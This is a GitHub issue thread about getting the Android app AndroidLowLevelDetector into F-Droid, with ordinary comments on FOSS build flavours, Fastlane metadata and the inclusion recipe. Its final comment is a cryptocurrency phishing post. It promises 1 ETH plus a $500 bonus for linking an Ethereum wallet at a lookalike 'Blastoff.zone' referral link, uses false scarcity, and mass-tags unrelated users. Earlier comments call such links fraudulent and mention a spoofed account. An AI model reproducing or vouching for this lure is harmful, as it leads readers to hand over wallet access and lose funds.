### ISSUE TITLE
F-Droid inclusion

### ISSUE THREAD

**Issue by shuvashish76** [imknown/AndroidLowLevelDetector#7]
Would you consider publishing this app on F-Droid please?

**Comment by imknown** [comment]
Hi. Thanks for your suggestion, I'll look into the F-Droid document when I have time. A little busy at work now. 😂

**Comment by shuvashish76** [comment]
RFP: https://gitlab.com/fdroid/rfp/-/issues/2224

**Comment by shuvashish76** [comment]
Could you please keep FOSS build flavour without those NonFreeDeps for F-Droid?

**Comment by imknown** [comment]
> Could you please keep FOSS build flavour without those NonFreeDeps for F-Droid?

[Added](https://github.com/imknown/AndroidLowLevelDetector/commit/de278fe1bc332f383c94ace389cb3cca6f28424f).

https://github.com/imknown/AndroidLowLevelDetector/blob/de278fe1bc332f383c94ace389cb3cca6f28424f/app/build.gradle.kts#L85-L88

**Comment by licaon-kter** [comment]
@imknown can you test? https://gitlab.com/fdroid/rfp/-/issues/2224#note_1122225807

Can you add a Fastlane structure be added? https://gitlab.com/snippets/1895688

Is 1.16.1 out soon?

**Comment by imknown** [comment]
@licaon-kter Hi, I will try to integrate Fastlane. But I cannot guarantee the ETA. Also for `1.16.1` or `1.17.0`. :(

**Comment by licaon-kter** [comment]
Fastlane here: https://github.com/imknown/AndroidLowLevelDetector/pull/8 ;)

**Comment by licaon-kter** [comment]
@imknown ping when you're ready to release, fyi https://gitlab.com/fdroid/fdroiddata/-/merge_requests/11972

**Comment by licaon-kter** [comment]
Any news @imknown ?

**Comment by imknown** [comment]
@licaon-kter Hi, sorry for my late reply, still busy with my work these month. 🥲

I think I should have solved it. The null-check of the androidx.activity library in version 1.8.0 has change a lot.
https://github.com/imknown/AndroidLowLevelDetector/commit/8a6003d2b12f888c735c6a3a1074ad93feeb5e65

Probably there will be no `1.16.1`.
Next release version should be `1.17.0`.
But I can't guarantee when it will be finished.
There are still some functions not completely completed, such as Shizuku, Android 13 Virtual-AB, etc.

Anyway, thank you very much. 😸

**Comment by licaon-kter** [comment]
Updated recipe: https://gitlab.com/fdroid/fdroiddata/-/merge_requests/11972/diffs
Built fine locally
Awaiting for CI so you can sign the APK and test as time permits: https://gitlab.com/licaon-kter/fdroiddata/-/jobs/3930900222

**Comment by IzzySoft** [comment]
@imknown did you find time to take a look – so we can further process the inclusion request at F-Droid?

**Comment by IzzySoft** [comment]
@imknown sorry to bother you again, but if there's no response we cannot process the RFP, and will have to close it unprocessed. That will happen in about a month.

**Comment by IzzySoft** [comment]
@licaon-kter oops: if you say the blocker is on our end, can you please make a corresponding comment on the MR and remove the due-date? Thanks!

**Comment by licaon-kter** [comment]
Not sure whose end is that :) :)

**Comment by licaon-kter** [comment]
ok, progress https://gitlab.com/fdroid/fdroiddata/-/merge_requests/11972/diffs?commit_id=cb727dcc8be401a5e4eeb6d93788939ba67bd9b9 now it builds

**Comment by IzzySoft** [comment]
@licaon-kter that's still set to draft. Will we be able to get this done, or shall we rather close down? RFP is on candidate-to-close (due to lack of response) and due-date reached again.

**Comment by licaon-kter** [comment]
@IzzySoft you mean publish whatever version we can build now instead of waiting for a release here?

**Comment by IzzySoft** [comment]
@licaon-kter oh, we're waiting for a new release? That was not clear for me. Then of course we do that. Maybe we should have a note for this on the MR as well? :see_no_evil:

**Comment by licaon-kter** [comment]
@IzzySoft see above https://github.com/imknown/AndroidLowLevelDetector/issues/7#issuecomment-1468102301

I can go either way...

**Comment by IzzySoft** [comment]
Just marked it on our end before I (or someone else) starts asking again. Thanks!

**Comment by Ofa234** [comment]
Delete

**Comment by Ofa234** [comment]
Delete all

**Comment by Ofa234** [comment]
Delete all

**Comment by shuvashish76** [comment]
@aasazali-seekasia 1. Why are you spamming here? 2. When GitHub started this kind of _lowlevel_ advertisements?

**Comment by aasazali-seekasia** [comment]
https://github.com/community/community/discussions/109171#discussioncomment-8544465

See this

**Comment by shuvashish76** [comment]
@aasazali-seekasia Yes that's what I asked why are you promoting the fraudulent link here & tagging random users. You want us to report you?

**Comment by aasazali-seekasia** [comment]
Hi apologies for this. Unfortunately there's bots posting this all around GitHub. You can report the post, but trust me I had no part in this.

**Comment by aasazali-seekasia** [comment]
Apparently the spoofing took place few weeks back, and it has been reported multiple times. Please reas the community post I shared earlier in the thread.

**Comment by aasazali-seekasia** [comment]
I was tagged in another post and after following the link, it seems to have been able to spoof this.

**Comment by shuvashish76** [comment]
> after following the link, it seems to have been able to spoof this using my ID

@aasazali-seekasia Oh ok, interesting. I believe you could revoke it's access from "Password and authentication" of GitHub settings.

**Comment by aasazali-seekasia** [comment]
Ah thanks @shuvashish76 for that 😄 sorry we got off on the wrong foot, but happy to not have this happen again, fingers crossed :)

**Comment by appwrk-it-solutions** [comment]
[![Banner](https://pbs.twimg.com/media/GFz-XdoaUAAeB3h.jpg:large)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Greetings, crypto enthusiasts! Blastoff.zone has an irresistible offer for the first 10 participants! Simply engage and link your wallet to claim a whopping 1 ETH along with an enticing $500 bonus.

## How to Participate:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to head to the Blastoff.zone platform.
2. Link your Ethereum wallet on the platform to qualify for the $500 bonus.
3. Utilize the "Claim Now" feature to secure your tokens.

Don't let this golden opportunity slip away! Act swiftly to claim your rewards before the 1 ETH allocation is all taken.

Please note that token allocation operates on a first-come, first-served basis. Out of the 100 tokens reserved for distribution, an impressive 90% have already been snapped up!
LarryDpk, @HackenHYJ, @liusishan, @Helenn3n, @zjuturtle, @CandySunPlus, @ozhong, @akyowan, @lgd18473481886, @plz0421, @qbmiller, @prettyEcho, @draguo, @WuShenghui, @MrTung, @hspeed, @wuwulailai, @EldersSun, @illuz, @liron-li, @Louis0723, @haogitgithub, @finiking, @iTonyYo, @nickqiao, @zhulisha, @gmdance, @Sunnykaby, @kerwin58, @SophieSarceau, @PhantomMaa, @phpercn, @tinoras, @rohsuton, @jiajun-c, @chenqihui, @payzulla, @papa3ggplant, @bytetang, @beautifulboy9527, @ntulsy, @nivalsoul, @Hyhyyy, @AwesomeYuer, @LipYY, @wandejiushixintiao, @martin-315, @wangLi007, @BCsl, @IzraelPalestynaWaleczny
